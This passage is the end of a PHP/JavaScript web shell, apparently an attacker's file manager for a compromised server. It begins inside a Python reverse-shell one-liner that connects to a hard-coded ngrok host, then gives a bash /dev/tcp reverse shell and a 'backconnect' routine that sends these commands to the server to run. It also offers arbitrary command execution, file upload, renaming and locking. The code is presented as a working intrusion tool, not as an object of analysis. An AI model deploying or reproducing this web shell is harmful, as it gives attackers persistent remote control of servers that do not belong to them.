socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ap.ngrok.io",19861));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`; } else if (backconnectType === 'bash') { command = `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`; } // Kirim perintah ke server untuk dieksekusi fetch('?backconnect', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: `command=${encodeURIComponent(command)}` }) .then(response => response.text()) .then(data => { alert('Backconnect initiated: ' + data); closeBackconnectModal(); }) .catch(error => { alert('Error initiating backconnect: ' + error); }); } function createFolder() { let folderName = prompt("Enter folder name:"); if (folderName) { document.getElementById("folderName").value = folderName; document.getElementById("folderForm").submit(); } } function createFile() { let fileName = prompt("Enter file name:"); if (fileName) { document.getElementById("fileName").value = fileName; document.getElementById("fileForm").submit(); } } function adjustTextareaSize(textarea) { textarea.style.height = 'auto'; textarea.style.height = (textarea.scrollHeight) + 'px'; } function showNotification(message, type = 'success') { const notification = document.createElement('div'); notification.className = `notification ${type}`; notification.textContent = message; document.body.appendChild(notification); setTimeout(() => { notification.remove(); }, 3000); } function openCmdModal() { document.getElementById('cmdModal').style.display = 'block'; } function closeCmdModal() { document.getElementById('cmdModal').style.display = 'none'; } function executeCmd() { const cmdInput = document.getElementById('cmdInput').value; if (!cmdInput) { alert('Please enter a command.'); return; } fetch('?cmd', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: `command=${encodeURIComponent(cmdInput)}` }) .then(response => response.text()) .then(data => { document.getElementById('cmdOutput').innerText = data; }) .catch(error => { document.getElementById('cmdOutput').innerText = 'Error executing command: ' + error; }); } function lockUnlockItem(itemPath, isDirectory = false) { if (confirm(`Are you sure you want to ${isDirectory ? 'lock/unlock' : 'lock/unlock'} this ${isDirectory ? 'directory' : 'file'}?`)) { window.location.href = `?lockunlock=${encodeURIComponent(itemPath)}&dir=${encodeURIComponent('<?= $currentDir ?>')}`; } } function renameItem(itemPath, isDirectory = false) { let currentName = itemPath.split('/').pop(); let newName = prompt(`Enter new name for ${isDirectory ? 'directory' : 'file'}:`, currentName); if (newName && newName !== currentName) { let form = document.createElement('form'); form.method = 'post'; form.action = ''; let inputPath = document.createElement('input'); inputPath.type = 'hidden'; inputPath.name = isDirectory ? 'rename_dir_submit' : 'rename_file'; inputPath.value = '1'; form.appendChild(inputPath); let inputNewName = document.createElement('input'); inputNewName.type = 'hidden'; inputNewName.name = 'new_name'; inputNewName.value = newName; form.appendChild(inputNewName); let inputOldPath = document.createElement('input'); inputOldPath.type = 'hidden'; inputOldPath.name = isDirectory ? 'rename_dir' : 'rename'; inputOldPath.value = itemPath; form.appendChild(inputOldPath); document.body.appendChild(form); form.submit(); } } document.addEventListener('DOMContentLoaded', function() { const textarea = document.querySelector('textarea'); if (textarea) { textarea.addEventListener('input', function() { adjustTextareaSize(this); }); adjustTextareaSize(textarea); } }); // Trigger file upload when the "Upload File" button is clicked document.querySelector('.upload-btn').addEventListener('click', function(e) { e.preventDefault(); document.getElementById('fileUpload').click(); }); // Automatically submit the form when a file is selected document.getElementById('fileUpload').addEventListener('change', function() { document.getElementById('uploadForm').submit(); }); </script> <!-- Directory Listing --> <?= listDirectories($currentDir) ?> </body> </html>